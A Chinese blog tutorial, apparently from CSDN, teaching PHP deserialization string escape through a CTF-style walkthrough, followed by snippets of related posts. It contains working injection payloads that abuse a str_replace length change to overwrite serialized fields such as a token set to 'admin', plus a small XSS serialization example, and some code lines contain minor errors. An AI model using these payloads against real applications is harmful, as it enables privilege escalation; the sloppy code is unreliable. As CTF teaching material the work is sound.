反序列化字符串逃逸(上篇)

已于 2024-02-28 21:27:55 修改
阅读量1.3k 收藏 21
点赞数 24
CC 4.0 BY-SA版权
分类专栏: 反序列化 文章标签: web CTF 安全 PHP反序列化 PHP反序列化字符串逃逸
于 2024-01-21 11:33:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csjjjd/article/details/135708854
本文详细解释了PHP中反序列化字符串逃逸的过程,通过示例展示了如何利用filter()函数进行字符串过滤以防止代码注入,并介绍了如何通过增加字符数量实现字符串逃逸的基本操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,必须先明白,这个点并不难,我给大家梳理一遍就会明白。

反序列化字符串逃逸就是序列化过程中逃逸出来字符,是不是很简单,哈哈哈!

好了,不闹了,其实:

这里你们只要懂得一个基础:

serialize() 函数序列化后可以保留其原始数据类型和结构,

而filter() 函数则可以对序列化后的字符串进行过滤,例如去除不安全的字符防止代码注入攻击等。具体过滤规则需要根据实际需求来定制。

举个栗子:

<?php
class user{
    public $username;
    public $password;
    public $BTG;

    public function __construct($u,$p){
        $this ->username=$u;
        $this ->password=$p;
        $this->BTG=0;
    }
}
$u=new user('admin','123456');
echo serialize($u);

这里就是最最基础的一个反序列化,然后运行得到的结果是:

O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:3:"BTG";i:0;}

1.这里在实战中相当于拿到一道题目,先拿到最初的反序列化

接下来,我在原来的代码上稍微做个字符串逃逸

再强调一次:filter() 函数则可以对序列化后的字符串进行过滤,例如去除不安全的字符防止代码注入攻击等。具体过滤规则需要根据实际需求来定制。

2:修改一下原来代码:filter() 函数对序列化后的字符串进行过滤,进行字符串逃逸。

<?php
class user{
    public $username;
    public $password;
    public $BTG;

    public function __construct($u,$p){
        $this ->username=$u;
        $this ->password=$p;
        $this->BTG=0;
    }
}

function filter($s){
    return str_replace('admin','hacker',$s);
}
$u = new user ('admin','hacker',$s);
$u_serialize=serialize($u);
$us=filter($u_serialize);
echo $us;

O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:3:"BTG";i:0;}//最初

O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:3:"BTG";i:0;}//最新逃逸后

在序列化字符串中,s:5:"hacker" 表示字符串类型的属性值,其中 s:5: 表示字符串长度为 5,而实际上应该是 6("hacker")。到这里已经逃逸成功了。这是因为在 filter() 函数中,将 "admin" 替换为 "hacker" 后,字符串长度发生了变化,导致序列化字符串中的长度信息不准确。

所以接下来这里我就要把;s:3:"BTG";i:0;这里的BTG变成1;

代码:

<?php
class user{
    public $username;
    public $password;
    public $BTG;

    public function __construct($u,$p){
        $this ->username=$u;
        $this ->password=$p;
        $this->BTG=0;
    }
}

function filter($s){
    return str_replace('admin','hacker',$s);
}
$u = new user ('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:3:"BTG";i:1;}','123456',$s);//这里就是把";s:8:"password";s:6:"123456";s:3:"BTG";i:1;}放进'admin'里面补齐最后一个字符而已,";s:8:"password";s:6:"123456";s:3:"BTG";i:1;}这里有45个字符,就直接一共45个admin,因为每次逃逸一个字符,所以必须重复45次

$u_serialize=serialize($u);
$us=filter($u_serialize);

echo($u_serialize);
结果:O:4:"user":3:{s:8:"username";s:270:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:3:"BTG";i:1;}";s:8:"password";s:6:"123456";s:3:"BTG";i:0;}

其实就到这里就搞定了,如果不放心,那就var——dump,把反序列化输出出来,

验证阶段:

<?php
class user{
    public $username;
    public $password;
    public $BTG;

    public function __construct($u,$p){
        $this ->username=$u;
        $this ->password=$p;
        $this->BTG=0;
    }
}

function filter($s){
    return str_replace('admin','hacker',$s);
}
$u = new user ('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:3:"BTG";i:1;}','123456',$s);
$u_serialize=serialize($u);
$us=filter($u_serialize);

$obj=unserialize($us);

var_dump($obj);

结果:

object(user)#2 (3) {
  ["username"]=>
  string(270) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
  ["password"]=>
  string(6) "123456"
  ["BTG"]=>
  int(1)
}
这里BTG从0变成了1,说明你是污染成功了的,因为我的原代码里面写死了BTG是0的,现在变成了1,所以证明反序列化是成功了。

我说现在大家应该都已经懂得反序列化字符串逃逸的一半了,不信?让我来引导大家做道例题就好了!

<?php


# @message.php


error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);


字符串逃逸特征: $umsg = str_replace('fuck', 'loveU', serialize($msg));

做这种题就三步走,千万别给自己加戏!

第一步:先拿到以个正常最初的反序列化:

代码如下

<?php

class message{

    public $from;
    public $msg;
    public $to;
    public $token='admin';
    public function __construct($f,$m,$t){
        $this->from=$f;
        $this->msg = $m;
        $this->to=$t;
        }
        }
function filter($msg){
    return str_replace('fuck','loveU',$msg);
}
$msg=new message('a','b','c');

$msg_1=serialize($msg);

echo $msg_1;

O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";N;s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
 

第二步:使用filter进行一次字符串逃逸。

<?php

class message{

    public $from;
    public $msg;
    public $to;
    public $token='admin';
    public function __construct($f,$m,$t){
        $this->from=$f;
        $this->to=$t;
        }
        }
function filter($msg){
    return str_replace('fuck','loveU',$msg);
}
$msg=new message('fuck','b','c');

$msg_1=serialize($msg);

$msg_2=filter($msg_1);

echo $msg_2;

O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"admin";}
第三步:算出要逃逸的次数进行复制输出

s:4:"loveU"很明显逃逸一个字符,因为每次逃逸一个字符,";s:5:"token";s:5:"admin";}这里有27个字符要逃逸,所以必须复制27次fuck,还有这得改成:";s:5:"token";s:5:"admin";},因为后面需要admin权限。

简单来说就是数出";s:5:"token";s:5:"admin";}这里有几个字符,然后输出一共几个fuck,再把";s:5:"token";s:5:"admin";}丢到fuck后面就完成了。

<?php
class message{
    public  $from;
public $msg;
public $to;
public $token='admin';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
function filter($msg){
    return str_replace('fuck','loveU',$msg);
}

$msg = new message('a','b','fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}');

$msg_1=serialize($msg);

$msg_2=filter($msg_1);
echo $msg_2;

O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:5:"admin";}

搞定了,到这里你可以自豪地说自己已经掌握了反序列化字符串逃逸的基础知识和基本操作。

当然了,这道题目还有一点尾巴,以及一些隐藏代码,但这里就不介绍了,因为到这里我们已经做出了反序列化字符串逃逸,基本已经解决了这道题

最后的最后,再进行一次总结:字符串逃逸有三步:

1.拿到正常序列化后字符串。(这个题目都会给·代码你,直接复制然后反序列化就好,没什么技术含量)

2.使用filter进行一次字符串逃逸。

3.第三步:算出要逃逸的次数进行复制输出(但是这里一定要提醒大家一下,字符串逃逸分为增多和减少,苦于篇幅上面我只介绍了一种增多,另外一种也是可以使用本方法的,只是有些地方要改一下,这个等我之后再更新文章)

ps:记住!无论字符串逃逸是增多还是减少,都是因为 return str_replace这个玩意替换字符后造成的逃逸。

真诚希望我的文章能够帮助大家,以及感谢看到这里的各位。

php反序列化字符串逃逸
weixin_74020633的博客
04-26 538
目标是img,其中是一个需要读取的php页面的base64编码,需要绕过php的过滤,因为flag会被替换为空,那么就可以利用替换为空时的引号进行闭合来包含需要绕过的地方,相当于把原本不会被过滤的一个位置置空,将需要绕过的地方放到不会被不会被过滤的地方。我们需要访问读取的页面是后缀为php,如果直接放在img中就会存在过滤,所以要利用替换函数进行字符串逃逸,使得目标页面能够成功读取。在学习之前,要先了解序列化字符串的结构,在了解结构的基础上才能更好理解要输入多少被过滤的字符串。但是这样的赋值是报错的。
CTFshow新春欢乐赛--web6--反序列化字符串逃逸
unexpectedthing的博客
02-09 1997
web6 考点:反序列化数组+字符串逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
java 字符串反序列化,java序列化和反序列化
weixin_29315569的博客
03-14 1220
对象序列化(serialization)反序列化(deserialization)是将对象转化为便于传输的格式进行发送和接收的两个操作。常见的序列化格式有字节数组,json字符串,xml字符串等。本次讨论的是java中的对象字节序列化。哪些东西可以是字节?图片可以是字节,文件可以是字节,一个字符串也可以是字节,嗯,宇宙间的一切事物都可以用字节表示。当然,对象也可以是字节。java的序列化就是将对...
字符串序列化与反序列化
like_study_cat的博客
01-07 3213
上一节我们学习了文件的读写,把一个字符串(或字节对象)保存到磁盘是一件很容易的事情。但是在实际编程中,我们经常需要保存结构化数据,比如复杂的字典、嵌套的列表等等,这时候就需要我们想办法把这些结构化数据先转变成一个字符串,这个转换过程就叫做“序列化”,这一过程的逆操作就是“反序列化”。 JSON序列化 序列化数据的操作在各个语言编程中都会遇到,当然也出现了标准化的格式,比如:JSON(JavaScr...
还在啃“反序列化”这块硬骨头?从零基础到精通,收藏这篇就够了!
最新发布
A1_3_9_7的博客
05-20 874
简单来说,序列化就是把咱们的对象,“biu”的一下变成字符串,方便存储和传输。那反序列化呢?就是把这个“biu”过的字符串,再“biu”回去,变回原来的对象,让程序接着用。在PHP里,这两个“biu”的操作分别由和函数负责。
反序列化JSON字符串
weixin_34163553的博客
12-23 303
2019独角兽企业重金招聘Python工程师标准>>> ...
php反序列化学习之字符串逃逸
竹盐笙熙的博客
02-13 1400
学习一下php反序列化字符串逃逸的知识点
对象流序列化与反序列化字符串 [Java]
m0_57001006的博客
01-05 313
对象流序列化与反序列化字符串的操作 首先这里我们给出序列化字符串的操作: 由于我们的String类实现了Serializable接口,这个时候我们就可以对字符串对象进行序列化 package IO流.对象流; import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.io.IOException; public class Demo1 { public static void main(St
反序列化字符逃逸问题
Whaocai的博客
08-10 296
字符逃逸的本质是替换后字符长度发生了改变。 两种情况:①替换后字符长度增加②替换后字符长度减少
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
浅析php反序列化字符串逃逸
Lemon's blog
08-26 3301
前言: php反序列化字符串逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
js中序列化与反序列化
热门推荐
cpf2016的专栏
01-08 1万+
(1)序列化                即js中的Object转化为字符串                1.使用toJSONString var last=obj.toJSONString(); //将JSON对象转化为JSON字符              2.使用stringify var last=JSON.stringify(obj); //将JSON对象转化为JSON字符
序列化和反序列化
weixin_61143354的博客
07-10 1216
网安
C# 序列化&反序列化
weixin_43925768的博客
10-08 2136
c# 序列化和反序列化的应用场景,序列化和反序列化的三种方式带例子
序列化与反序列化
W_7Vv的博客
01-10 2476
如何理解序列化与反序列化
反序列化字符串逃逸——初体验
D.MIND 的博客
02-27 1540
前言:从CTFshow上做的一道反序列化字符串逃逸的题,第一次接触,想了半天(可能是我太菜了>__<)后来才发现其实不难理解,真的需要动手写脚本操作一下,光看不好理解 题目链接 message.php: <?php highlight_file(__FILE__); include('flag.php'); class message{ public $from; public $msg; public $to; public $token='user
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1544
php反序列化字符逃逸
php反序列化之字符逃逸
qq_53856457的博客
05-14 2159
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
php反序列化】详细解释字符串逃逸的原理
Yuppie001的博客
06-13 1295
PHP反序列化漏洞是一种通过修改类中的成员属性来触发各种魔术方法,从而达到攻击目的的漏洞。构造POP链的目的是利用这些漏洞,攻击者通过操作PHP对象的属性以及对象中定义的魔术方法,形成一条操作链,最终实现任意代码执行或其他恶意行为。在反序列化的防御过程中常常会有通过正则的方式进行替换目标构造的序列化字符串。//实例化对象//序列化对象//对序列化的数据进行字符替换(过滤)//反序列化我们说的字符串逃逸就是绕过这种防御方式的一种手段。
php反序列化字符逃逸xss
01-29
### PHP 反序列化中的字符逃逸与 XSS 攻击 #### 防御措施 为了防止通过反序列化操作引发的安全风险,尤其是针对XSS攻击,应当采取严格的输入验证机制。任何来自用户的输入都应被视作潜在威胁并加以过滤和消毒处理[^1]。 对于PHP应用程序而言,在接收外部传入的数据之前,应该先对其进行严格校验,确保其合法性后再考虑是否允许进入后续逻辑流程中;同时也要注意对敏感函数调用处做额外防护,比如禁用危险方法或属性设置只读权限等手段来减少可能存在的漏洞面[^2]。 另外一种有效的预防方式就是避免直接存储可执行代码片段于对象内部成员变量之中——这不仅能够有效阻止因意外情况而导致程序行为失常的现象发生,而且还可以大大降低由于设计缺陷所造成的安全隐患级别[^3]。 最后但同样重要的是保持框架版本更新至最新状态,并积极关注官方发布的安全公告以便及时修补已知问题[^4]。 ```php // 输入验证示例 function validateInput($input){ // 实现具体的验证逻辑... } $inputData = $_GET['data']; if (!validateInput($inputData)) { die('Invalid input'); } ``` #### 利用实例分析 尽管不推荐主动制造此类漏洞用于测试目的之外的情况,但在特定环境下理解这些技术细节有助于加深开发者对于安全性概念的认识程度以及提高修复能力水平。 考虑到实际场景应用时可能会遇到各种复杂状况,这里给出一个基于给定条件下的简单案例说明: 假设存在如下所示的一个异常类定义,其中包含了未经转义便直接嵌套HTML标签的内容作为消息参数传递给了构造器,则当该对象经过序列化之后再次被还原成原始形态之时就会触发浏览器端脚本执行环境内的弹窗警告事件。 ```php <?php class ExceptionWithHtmlMessage extends \Exception{ protected $message; public function __construct(string $msg){ parent::__construct(); $this->message=$msg; } } $a=new ExceptionWithHtmlMessage("<script>alert('xss')</script>"); $b=serialize($a); echo urlencode($b); // 输出编码后的字符串供进一步利用 ?> ``` 上述代码展示了如何创建含有恶意脚本的对象并通过`serialize()`将其转换为字符串形式输出。一旦此数据流重新加载回服务器端解析空间内完成重建动作后即刻激活预埋设好的JavaScript指令集从而实现跨站脚本注入效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值